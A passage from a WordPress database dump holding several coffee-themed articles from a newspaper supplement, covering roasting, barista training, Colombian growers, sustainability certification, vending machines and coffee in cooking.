dow</p></div>&#13;\n<p>“Roasting turns coffee from a base metal into gold, unleashing all their essential oils which provide flavour and aroma,” he says. “The beans are roasted to varying degrees, depending on the desired outcome.”</p>&#13;\n<p>Although beans can be from one origin, they are often blended together. According to coffee manufacturer Douwe Egberts, this improves flavour and product consistency.</p>&#13;\n<p>“Each brand of coffee has a flavour profile,” a spokesperson says. “This is much easier to maintain in blends as any minor changes can be subtly adjusted.”</p>&#13;\n<p>These subtle changes depend on the taste buds of a team of wide-eyed testers who guzzle up to 300 cups of coffee a day to ensure each batch tastes as good as the last. The beans are ground down and instant coffee varieties are spray or freeze- dried to create the dark, soluble powder.</p>&#13;\n<p></p><div id=\"attachment_1416\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1416\" title=\"5.4\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/5.4.jpg\" alt=\"\" width=\"596\" height=\"419\" /><p class=\"wp-caption-text\">Stage five: add water and enjoy</p></div>&#13;\n<p>The BCA’s Paul says: “Instant coffee is sold in glass jars as it best preserves coffee quality. But the beans first need to rest as grinding creates a lot of gases and they would explode if immediately packaged.”</p>&#13;\n<p>That really would start Monday morning off with a bang.</p>&#13;\n									</div>','Bean there, done that','648','publish','open','open','','bean-there-done-that','','','2018-04-02 20:09:42','2018-04-02 20:09:42','',0,'http://westonspirit.org.uk/bean-there-done-that.asp',0,'post','',0),(48,1,'2015-09-17 19:29:42','2015-09-17 19:29:42','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Called to the bar\" st_url=\"http://westonspirit.org.uk/2011/10/called-to-the-bar/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Called to the bar\" st_url=\"http://westonspirit.org.uk/2011/10/called-to-the-bar/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Called to the bar\" st_url=\"http://westonspirit.org.uk/2011/10/called-to-the-bar/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Called to the bar\" st_url=\"http://westonspirit.org.uk/2011/10/called-to-the-bar/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Called to the bar\" st_url=\"http://westonspirit.org.uk/2011/10/called-to-the-bar/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>What goes into serving us our coffee shop favourites</h4>&#13;\n<p>How much should the perfect latte weigh? And what is the optimum temperature of milk? Well, I can tell you that it’s 330g and somewhere between 55-60°C, respectively. Indeed, after a few hours spent at Pret A Manger’s barista academy in London, I quickly learnt that there’s more to making a good coffee than meets the eye.</p>&#13;\n<p>At the food and drink chain, a barista is only deemed qualified to decant your drink after 12 weeks’ theory and practical training. After which, graduates are expected to have expert knowledge of making every beverage in the book.</p>&#13;\n<p>But being able to churn out coffees isn’t conducive to a great customer experience, so what exactly makes a good barista? According to Lesley Cox, Pret’s barista trainer, it’s all about the attention to detail: “It’s like a conductor with his orchestra, everything works in a smooth way, yet there’s a lot going on.”</p>&#13;\n<p></p><div id=\"attachment_1411\" class=\"wp-caption alignleft\" style=\"width: 606px\"><img class=\"size-full wp-image-1411\" title=\"4.2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/4.2.jpg\" alt=\"\" width=\"596\" height=\"397\" /><p class=\"wp-caption-text\">Hot stuff: serving up a cup</p></div>&#13;\n<p>A good barista should also be able to multi-task. “If you stand back and watch, you’ll notice them constantly cleaning the equipment while making and remembering orders. A lot of baristas thrive under that pressure,” she says. Cox showed me the basics – frothing and “stretching” the milk, while creating an espresso base with a golden coverage of crema. After a few attempts, I was ready to leave the safe confines of the training room.</p>&#13;\n<p>In a nearby Pret store I meet my mentor, Laji. A 24-year-old student, Laji has been an employee for four years and a barista for 18 months.</p>&#13;\n<p>Confidently putting on the apron, I was ready. This was my time to shine.</p>&#13;\n<p>But, before I could declare: ‘Bean there, done that’, it was over. After getting the angle of my steam arm wrong, it spiralled out of control and I ended up with a scale-tipping latte with a taste to match the bitter disappointment of my efforts.</p>&#13;\n<p>I should note that Laji’s cup weighed a textbook 331g. The next time you’re waiting in line for a coffee and wonder ‘How hard can it be?’, let me tell you – quite hard. As each barista must display a balance of science, art and showmanship, I’ve seen there’s more that goes into your cup than just coffee.</p>&#13;\n									</div>','Called to the bar','376','publish','open','open','','called-to-the-bar','','','2018-04-02 20:09:40','2018-04-02 20:09:40','',0,'http://westonspirit.org.uk/called-to-the-bar.asp',0,'post','',0),(49,1,'2014-03-04 15:27:42','2014-03-04 15:27:42','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Coffee special – Love the bean\" st_url=\"http://westonspirit.org.uk/2011/10/coffee/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Coffee special – Love the bean\" st_url=\"http://westonspirit.org.uk/2011/10/coffee/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Coffee special – Love the bean\" st_url=\"http://westonspirit.org.uk/2011/10/coffee/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Coffee special – Love the bean\" st_url=\"http://westonspirit.org.uk/2011/10/coffee/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Coffee special – Love the bean\" st_url=\"http://westonspirit.org.uk/2011/10/coffee/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<p> </p>&#13;\n<p>Approximately 70m cups of coffee are consumed in the UK each day; not bad for a nation of tea drinkers. We explore what coffee is all about for those who make, sell, buy and drink it. We look at the impact the beverage has had on our health, culture, eating habits and lifestyle.</p>&#13;\n<p>Distributed with <em>The Guardian</em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=111031094933-7ad5c5e8f8f64f6688ea19f070cfee10&amp;docName=coffee&amp;username=Lyonsdown&amp;loadingInfoText=Coffee&amp;backgroundColor=FFF9B6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=111031094933-7ad5c5e8f8f64f6688ea19f070cfee10&amp;docName=coffee&amp;username=Lyonsdown&amp;loadingInfoText=Coffee&amp;backgroundColor=FFF9B6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n									</div>','Coffee special – Love the bean','74','publish','open','open','','coffee-special-love-the-bean','','','2018-04-02 20:09:39','2018-04-02 20:09:39','',0,'http://westonspirit.org.uk/coffee-special-love-the-bean.asp',0,'post','',0),(50,1,'2017-09-06 09:48:25','2017-09-06 09:48:25','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Colombian coffee: where integrity is the key ingredient\" st_url=\"http://westonspirit.org.uk/2011/10/colombian-coffee-where-integrity-is-the-key-ingredient/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Colombian coffee: where integrity is the key ingredient\" st_url=\"http://westonspirit.org.uk/2011/10/colombian-coffee-where-integrity-is-the-key-ingredient/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Colombian coffee: where integrity is the key ingredient\" st_url=\"http://westonspirit.org.uk/2011/10/colombian-coffee-where-integrity-is-the-key-ingredient/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Colombian coffee: where integrity is the key ingredient\" st_url=\"http://westonspirit.org.uk/2011/10/colombian-coffee-where-integrity-is-the-key-ingredient/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Colombian coffee: where integrity is the key ingredient\" st_url=\"http://westonspirit.org.uk/2011/10/colombian-coffee-where-integrity-is-the-key-ingredient/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Behind Colombian coffee lies a commitment to sustainability and fair pricing that benefits some 500,000 coffee growers in the Andes, most of them small-scale producers</h4>&#13;\n<p>For years, Colombian coffee has been known for its consistent quality and pronounced aroma. Every time you buy 100 per cent Colombian coffee, a protected geographical indication (PGI), you are getting 100 per cent mild arabica, hand-picked high quality coffee.</p>&#13;\n<p>The PGI designation is critically important, though not everyone understands its significance. In fact, Colombian coffee was the first non-European product to be given such status by the European Commission in 2007, as it could demonstrate its quality assurance system and the close link between quality and its region of origin.</p>&#13;\n<p><img class=\"alignleft size-full wp-image-1399\" title=\"2.1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/2.1.jpg\" alt=\"\" width=\"596\" height=\"397\" /></p>&#13;\n<p>Colombia has more than 500,000 coffee growers spread throughout the Andes mountain range. Some 95 per cent of them are small producers owning less than five cultivated coffee hectares.</p>&#13;\n<p>What makes them unique is that they are organised in a guild, the Colombian Coffee Growers Federation (FNC) which allows them to pool resources and efforts for the greater good.</p>&#13;\n<p>Since its creation in 1927, the FNC’s mission has been to guarantee the growers’ long-term sustainability through social investment, research and development, technical extension, quality control and promotion of Colombian coffee worldwide.</p>&#13;\n<p>In addition, under a unique fair commerce scheme, the FNC guarantees the growers a transparent price for their coffee based on daily market conditions and coffee quality. </p><div class=\"woo-sc-quote\"><p>The FNC’s mission is to guarantee coffee growers’ long-term sustainability through social investment, research and development, technical extension, quality control and promotion of Colombian coffee worldwide</p></div>This is possible thanks to a network of more than 500 points of purchase located throughout the country’s 20 coffee-growing regions.&#13;\n<p>Colombia’s continued efforts to support the wellbeing of coffee growers, as well as the economic and environmental sustainability of their activity, are based on a model that other coffee-producing regions would like to replicate. This is why there are a number of 100 per cent Colombian brands, identified by the Juan Valdez coffee grower character, which emphasise to consumers that they are committed to making a difference for hundreds of thousands of small coffee growers.</p>&#13;\n<p>By buying Juan Valdez-marked Colombian coffee, consumers are also helping to support the FNC Sustainability That Matters programmes, focused on productivity, social development, environmental protection and connectivity for the producers.</p>&#13;\n<p></p><div id=\"attachment_1400\" class=\"wp-caption alignleft\" style=\"width: 606px\"><img class=\"size-full wp-image-1400\" title=\"2.2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/2.2.jpg\" alt=\"\" width=\"596\" height=\"399\" /><p class=\"wp-caption-text\">FNC guarantee: price for coffee is based on market conditions and coffee quality</p></div>&#13;\n<p>“As coffee growers, we are aware that the sustainability of Colombian coffee, the richest coffee in the world, depends on our commitment to the environment and the wellbeing of our community. Consequently, since 1927 we’ve been working as an institution on a model based on quality, peace and progress,” says Luis Munoz, FNC’s CEO.</p>&#13;\n<p>Colombian coffee has been sold in the UK for more than 30 years, both instant and ground. Look for the Café de Colombia logo (Juan Valdez and his mule Conchita) in brands such as Juan Valdez, Buendía, and Cafe Nueva. Many other brands, such as Nescafé, Percol, Costa Coffee and Senseo, also use Colombian coffee so help to support the FNC in its work.</p>&#13;\n<p>The Juan Valdez signature brand premium freeze-dried coffee is available at Tesco stores. This brand is produced at the FNC factory, Buencafé, one of the largest and most modern coffee facilities in the world, and the only freeze-dried coffee plant in Colombia. A share of the sales of this particular product is directed towards the Sustainability That Matters programmes.</p>&#13;\n<div class=\"woo-sc-box normal   \"><em>To download the FNC sustainability report visit</em>&#13;\n<p><strong><em><a title=\"www.SustainabilityThatMatters.org\" href=\"http://www.sustainabilitythatmatters.org/\" target=\"_blank\">www.SustainabilityThatMatters.org</a></em></strong></p>&#13;\n<p><em>See more of what’s behind Colombian Coffee at</em></p>&#13;\n<p><strong><em><a title=\"www.cafedecolombia.com\" href=\"http://www.cafedecolombia.com/\" target=\"_blank\">www.cafedecolombia.com</a></em></strong></p></div>&#13;\n									</div>','Colombian coffee: where integrity is the key ingredient','587','publish','open','open','','colombian-coffee-where-integrity-is-the-key-ingredient','','','2018-04-02 20:09:37','2018-04-02 20:09:37','',0,'http://westonspirit.org.uk/colombian-coffee-where-integrity-is-the-key-ingredient.asp',0,'post','',0),(51,1,'2016-03-04 16:54:04','2016-03-04 16:54:04','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Full of beans\" st_url=\"http://westonspirit.org.uk/2011/10/full-of-beans/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Full of beans\" st_url=\"http://westonspirit.org.uk/2011/10/full-of-beans/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Full of beans\" st_url=\"http://westonspirit.org.uk/2011/10/full-of-beans/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Full of beans\" st_url=\"http://westonspirit.org.uk/2011/10/full-of-beans/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Full of beans\" st_url=\"http://westonspirit.org.uk/2011/10/full-of-beans/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Some 70m cups of coffee are imbibed every day in the UK, which is a considerable number of cappuccinos, lattes, mochas and plain old filter types for a nation traditionally devoted to tea.</h4>&#13;\n<p>In these pages we offer a flavour of what coffee is all about for the people who make it, sell it, buy it and drink it; from the staggering sums spent globally on the world’s second most traded commodity (after oil) to some of the very odd uses to which coffee and its by-products are regularly put.</p>&#13;\n<p><img class=\"alignleft size-full wp-image-1396\" title=\"1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/1.jpg\" alt=\"\" width=\"417\" height=\"278\" />Did you know, for example, that while some people use it as an attractor and a sign that a nice evening might not be over after the drive home, others employ it to repel insects or to keep their angling bait fresh and wriggling for all-night fishing trips?</p>&#13;\n<p>And while there is without doubt an awful lot of coffee in Brazil, we’ll look at where else – and how – coffee beans are grown and sample some of the mind-blowing beverages available in coffee shops and on supermarket shelves.</p>&#13;\n<p>On the taste front, we learn how some famous faces take their coffee and reveal how coffee flavours are not restricted to the dessert course by our more enterprising chefs. Grouse with cocoa nibs and coffee-flavoured bangers and mash, anyone?</p>&#13;\n<p>We also explore the colourful history of emporia in this country, from the time when Britain’s women took a stand against “nauseous Puddle-water” through the formation of some of the world’s most famous financial institutions to the brightly-lit frappuccino wonderlands of today.</p>&#13;\n<p>Along the way, find out how JS Bach celebrated coffee in song and whether the medical boffins think the drink is good or bad for us – for this week, at least…</p>&#13;\n									</div>','Full of beans','293','publish','open','open','','full-of-beans','','','2018-04-02 20:09:35','2018-04-02 20:09:35','',0,'http://westonspirit.org.uk/full-of-beans.asp',0,'post','',0),(52,1,'2017-09-13 12:40:56','2017-09-13 12:40:56','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Get a taste of sustainability\" st_url=\"http://westonspirit.org.uk/2011/10/get-a-taste-of-sustainability/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Get a taste of sustainability\" st_url=\"http://westonspirit.org.uk/2011/10/get-a-taste-of-sustainability/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Get a taste of sustainability\" st_url=\"http://westonspirit.org.uk/2011/10/get-a-taste-of-sustainability/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Get a taste of sustainability\" st_url=\"http://westonspirit.org.uk/2011/10/get-a-taste-of-sustainability/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Get a taste of sustainability\" st_url=\"http://westonspirit.org.uk/2011/10/get-a-taste-of-sustainability/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Demand for sustainability-sourced coffee is up and one company is looking to meet that demand while raising living standards for farmers</h4>&#13;\n<p>Sustainability is important for everyone. After all, our future is at stake. In order to be able to make a substantial contribution to sustainability, UTZ Certified has adopted a practical approach, working together with existing brands. The manufacturers of these brands need raw materials on a large scale – raw materials that are produced by farmers in developing countries. By increasing the sustainability of these raw materials, we are able to raise the standard of living of a large number of farming communities.</p>&#13;\n<p>The importance of sustainable production for multinational companies is emphasised in the report The Third Industrial Revolution, written by ING. Multinationals should commit to the producers in upcoming markets such as Brazil, by passing on knowledge and investing in the economic development of these countries.</p>&#13;\n<div id=\"attachment_1374\" class=\"wp-caption alignright\" style=\"width: 310px\"><img class=\"size-full wp-image-1374\" title=\"7\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/7.jpg\" alt=\"\" width=\"300\" height=\"361\" /><p class=\"wp-caption-text\">UTZ Certified: providing practical solutions for coffee farmers</p></div>&#13;\n<p>Companies who fail to do so should take into account that this will eventually lead to a weakening of their own market position, according to ING. The bank calls this development ‘the third industrial revolution’.</p>&#13;\n<p>UTZ Certified supports the position for sustainable sourcing that has been pointed out in the report. Sustainability is emerging from the niche position where it has been over the past years. This becomes evident through the increasing demand for sustainably sourced coffee and also through the increased willingness to invest in and commit to sustainability by the mainstream market’s biggest players such as Sara Lee, an important partner of UTZ Certified. It is no longer just an issue of poverty reduction – it is about achieving more efficient production and increased cost-efficiencies.</p>&#13;\n<p>Sustainable agriculture starts with knowledge being passed on to the producers about how to manage their farms. UTZ Certified therefore trains farmers and provides them with practical solutions for common challenges in the area of coffee farming. The UTZ Certified sustainability programme works from a top- down approach using the UTZ Certified code to meet market requirements, as well as a bottom- up approach analysing the major problem areas for farmers on issues that have the most impact on income and sustainability.</p>&#13;\n<p>UTZ Certified is convinced that increasing sustainability should also reinforce the independent position of farmers. This is why farmers are trained in the professionalisation of their agricultural practice and operational management. This improves the quality of their products and allows them to produce higher volumes at lower costs and, in turn, improves their standard of living as it enables the farmers to negotiate a better price for a better product. Moreover, farmers who work with UTZ Certified in the global marketplace receive a premium for their crop and they do not have to pay for taking part in the programme.</p><div class=\"woo-sc-quote\"><p>Its no longer just an issue of poverty reduction – it is about achieving more efficient production and increased cost-efficiencies</p></div>&#13;\n<p>By working with a strict code of conduct, UTZ Certified sets stringent requirements for the farmers when it comes to the sustainable growing of coffee, cocoa and tea. Their operational management is checked by independent third parties.</p>&#13;\n<p>The UTZ Certified tracking system subsequently guarantees that the raw materials have actually been grown and harvested in a responsible manner.</p>&#13;\n<p>UTZ Certified has grown to become one of the largest sustainability programmes for coffee, cocoa and tea in the world: one-third of all coffee that is sustainably traded worldwide is certified by UTZ. Brands that have committed themselves to the sourcing of sustainable UTZ Certified raw materials are global market leaders. One of those market leaders is Sara Lee, roaster of Douwe Egberts coffee.</p>&#13;\n<p>Sara Lee’s approach to sustainability means sourcing commodities in a sustainable way, improving efficiency of their manufacturing processes, bringing responsible products to the market and supporting local farming communities in origin countries.</p>&#13;\n<p>Sara Lee chose a certification programme to work with which best fitted with their broader objectives. Based on intensive research by Sara Lee, the values associated with UTZ Certified are closely linked to consumers’ expectations of a certification programme and also match the company’s goals very well.</p>&#13;\n<p>In the past five years Sara Lee has become the world’s largest buyer of UTZ Certified coffee thanks to cumulative purchases of more than 110m kilos of coffee. Today the company committed to more than triple that amount over the next five years and will purchase at least 350m kilos across all its markets and product segments. The company estimates that its sustainability investments can give coffee farmers, their associations and representatives up to $100m of additional income over what they would have earned by selling uncertified coffee beans in the open market.</p>&#13;\n<p>In November 2010, Douwe Egberts UK underlined this commitment and took an important step in its journey towards sustainability, pledging that by 2018 only 100 per cent UTZ Certified beans would be used in its ground coffee products. Its new range of coffees – being launched in late October 2016 – contain an ever-increasing amount of sustainably sourced, UTZ Certified coffee, and meet the needs of coffee drinkers in every way.</p>&#13;\n<p>The coffees are suitable for all coffee makers and each of the six blends has its own unique flavour, so there’s sure to be something to suit every mood or occasion. Join UTZ Certified on the journey to sustainability; enjoy your favourite Douwe Egberts coffee while at the same time contributing to a more sustainable world.</p>&#13;\n									</div>','Get a taste of sustainability','888','publish','open','open','','get-a-taste-of-sustainability','','','2018-04-02 20:09:34','2018-04-02 20:09:34','',0,'http://westonspirit.org.uk/get-a-taste-of-sustainability.asp',0,'post','',0),(53,1,'2014-06-11 19:13:01','2014-06-11 19:13:01','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Love coffee, hate vending?\" st_url=\"http://westonspirit.org.uk/2011/10/love-coffee-hate-vending/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Love coffee, hate vending?\" st_url=\"http://westonspirit.org.uk/2011/10/love-coffee-hate-vending/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Love coffee, hate vending?\" st_url=\"http://westonspirit.org.uk/2011/10/love-coffee-hate-vending/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Love coffee, hate vending?\" st_url=\"http://westonspirit.org.uk/2011/10/love-coffee-hate-vending/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Love coffee, hate vending?\" st_url=\"http://westonspirit.org.uk/2011/10/love-coffee-hate-vending/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>There is a surprise hidden behind the doors of vending machines – and the results may please even the most ardent coffee lover</h4>&#13;\n<p>There is no doubt that a bad reputation can be difficult to shake, and vending has a chequered past.</p>&#13;\n<p>The UK has become a coffee-loving nation, with coffee shops at its heart. However, the best-kept secret in coffee might just be discovered somewhere unexpected.</p>&#13;\n<p>The coffee revolution hasn’t only hit the high street, it’s also changed what happens behind closed doors; inside a vending machine.</p>&#13;\n<p><img class=\"size-full wp-image-1392 alignright\" title=\"11\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/11.jpg\" alt=\"\" width=\"358\" height=\"372\" /></p>&#13;\n<p>All the usual favourites – such as latte, cappuccino and Americano – are available at the touch of a button. As every coffee buff knows, a great espresso is the base of all other coffee drinks and it starts with the beans. Not many people realise that a great many vending machines are now filled with fresh beans, and make drinks using a grinder and high-pressure brewer – you just can’t see it all happening.</p>&#13;\n<p>The process in the machine is the same as behind the counters of the nation’s coffee shops. When the button is pressed, freshly roasted whole beans are ground to order for every individual drink. The coffee is tamped before the full taste is extracted with filtered water under 12-bar pressure, releasing the rich oils and aromas.</p>&#13;\n<p>While the science is in the machine, the art comes from the experts who set up and care for them. Each drink has a carefully crafted recipe, calibration is set by hand and brewing times are exact, blending the ingredients to create a range of espresso-based drinks. For a milky latte or cappuccino, real milk is prepared before being added to the espresso.</p>&#13;\n<p>Selecta is Europe’s leading vending supplier. Andy Mee, managing director (UK and Ireland), says: “Essentially, it’s like having a barista inside the machine serving a great quality drink at a lower price than a coffee shop, without the queue.”</p>&#13;\n<p>If you love coffee, try vending; you might just love it too.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong><a title=\"www.selecta.co.uk\" href=\"http://www.selecta.co.uk/\" target=\"_blank\">www.selecta.co.uk</a></strong></em></p>&#13;\n									</div>','Love coffee, hate vending?','334','publish','open','open','','love-coffee-hate-vending','','','2018-04-02 20:09:33','2018-04-02 20:09:33','',0,'http://westonspirit.org.uk/love-coffee-hate-vending.asp',0,'post','',0),(54,1,'2014-04-29 21:50:14','2014-04-29 21:50:14','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Making a meal of coffee\" st_url=\"http://westonspirit.org.uk/2011/10/making-a-meal-of-coffee/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Making a meal of coffee\" st_url=\"http://westonspirit.org.uk/2011/10/making-a-meal-of-coffee/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Making a meal of coffee\" st_url=\"http://westonspirit.org.uk/2011/10/making-a-meal-of-coffee/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Making a meal of coffee\" st_url=\"http://westonspirit.org.uk/2011/10/making-a-meal-of-coffee/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Making a meal of coffee\" st_url=\"http://westonspirit.org.uk/2011/10/making-a-meal-of-coffee/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Coffee isn’t just an after-dinner drink – it deserves its place further up the menu too, according to some of the country’s top foodies</h4>&#13;\n<p>The bitter notes and smoky aromas of coffee add depth to autumn and winter menus, according to celebrated chef Michel Roux Jr.</p>&#13;\n<p>“For me, it’s seasonal,” he says. “It offers a change from the fresher fruit and herb flavours of the summer.”</p>&#13;\n<p>Coffee can add richness to dessert menus such as a chocolate Swiss roll with coffee cream (below) but can be used with savoury dishes, as Roux, who is chef-patron at London’s two Michelin-star Le Gavroche, explains.</p>&#13;\n<p>He adds it to a sauce served with game. “I find it works well with the smokiness of game, when contrasted with chutney and berries,” he says.</p>&#13;\n<p>Meat and coffee combinations are also being explored by Antonin Bonnet, head chef at the Greenhouse in London’s Mayfair. Bonnet serves grouse with cocoa nibs (pieces of raw chocolate) and espresso mashed potatoes.</p>&#13;\n<p><img class=\"alignleft size-full wp-image-1387\" title=\"9.1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/9.1.jpg\" alt=\"\" width=\"596\" height=\"425\" />“The inspiration for the dish became obvious to me over breakfast one morning,” he says. “I noticed one of the best matches with a cup of coffee is salted butter on toast. The transformation from toast to potato wasn’t difficult, knowing how much butter goes into our mashed potato.”</p>&#13;\n<p>He explains that the flavour of the espresso mash complements the gaminess of the grouse and the bitterness of the cocoa nibs: “It is almost like a mocha dessert only savoury – really addictive.”</p>&#13;\n<p>Bonnet thinks the principle would work in a “posh bangers and mash” and has adapted the recipe for readers.</p>&#13;\n<p>Coffee works equally well with pan-fried lamb chops (where espresso is combined with Worcestershire sauce, spices and chilli flakes to lift the meat juices from the pan) or to glaze espresso-roasted pork shoulder with a rich mixture that includes honey and balsamic vinegar and tomato purée, says Bristol-based award-winning chef and consultant Martin Blunos.</p>&#13;\n<p>Blunos, who was awarded two Michelin stars at his Latvian-inspired restaurant Lettonie and is also known as the inspiration behind Blunos Blend – a coffee developed by Bristol roasting company Brian Wogan – demonstrated these gutsy meat dishes at this year’s Bath Coffee Festival.</p>&#13;\n<p>“I used coffee in these lamb and pork recipes as the bitter note to balance the natural sweetness of the meats,” he says.</p>&#13;\n<p>So coffee is packing a punch in main courses but also appearing later in the menu – and not just in desserts. Roel Lintermans, head chef at The Gallery at Sketch, was inspired by the restaurant’s founder Pierre Gagnaire to include coffee on a cheese plate.</p>&#13;\n<p>Lintermans places coffee syrup (made through a reduction of coffee with glucose added to thicken it) with Morbier cheese on the plate alongside a terrine of St Agur, cheddar and port, and goat’s cheese and green tomato chutney. “The creamy Morbier cheese works with the bitter black coffee,” he says.</p>&#13;\n<p>Such is the popularity of coffee that foodies think it should become an after-dinner statement in its own right. Polly Betton, who is championing a revival in country house parties and has been named a “get-together guru” by Harper’s Bazaar, includes a recipe for coffee-infused milk and white chocolate-dipped coffee beans in her new book Party! (Kyle Books, £19.99)</p>&#13;\n<p>“The recipe is a deconstruction and rearrangement of the classic after-dinner coffee,” says Betton. “The milk is mildly caffeinated and relaxing, while the major caffeine hit is delivered directly from the bean.”</p>&#13;\n<p>And it’s back to nature for Stefan Gates, self-proclaimed gastronaut and member of culinary think-tank the Experimental Food Society, who advises that dinner party hosts could make the evening memorable by serving green coffee beans.</p>&#13;\n<p>“I get people to roast their own coffee from green beans at the table – you just dry-fry them in a small pan,” he says.</p>&#13;\n<p>“Then I put them in a grinder and make coffee out of them,” he says.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>Chocolate Swiss roll with coffee cream</h3>&#13;\n<p><strong>From Le Gavroche</strong></p>&#13;\n<h3>Serves 10</h3>&#13;\n<ul><li>120g plain flour</li>&#13;\n<li>30g cocoa powder</li>&#13;\n<li>5 whole eggs</li>&#13;\n<li>140g caster sugar</li>&#13;\n</ul><h3>Coffee syrup</h3>&#13;\n<ul><li>1 tbsp dark muscovado sugar</li>&#13;\n<li>125ml hot espresso or very strong coffee</li>&#13;\n</ul><h3>Coffee cream</h3>&#13;\n<ul><li>2 egg yolks</li>&#13;\n<li>120g icing sugar</li>&#13;\n<li>80g butter</li>&#13;\n<li>1 espresso coffee</li>&#13;\n<li>2 tbsp instant coffee</li>&#13;\n<li>2 tbsp 